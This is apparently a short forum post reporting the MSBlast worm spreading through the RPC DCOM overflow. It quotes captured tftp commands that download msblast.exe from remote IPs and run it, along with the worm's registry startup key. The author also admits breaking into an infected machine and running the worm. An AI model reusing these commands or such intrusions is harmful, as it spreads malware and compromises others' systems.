By sniffing my connection i detected a new worm propagating by the rpc dcom overflow 

i saw a couple of connection trying to connect on my port 4444 so i did a little listen on it 
---------
tftp -i 142.217.249.63 GET msblast.exe
tftp -i 142.217.242.78 GET msblast.exe
start msblast.exe
msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.247.115 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.254.164 GET msblast.exe
tftp -i 142.217.228.200 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i .... and it continues...
------------------------------

so i got into one of those computer with the rpc overflow and download MSBLAST.exe
i installed it 
i begins the scan by 108.41.62.1-255 on port 135

and it put itself into the registry on the startup 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update "msblast.exe"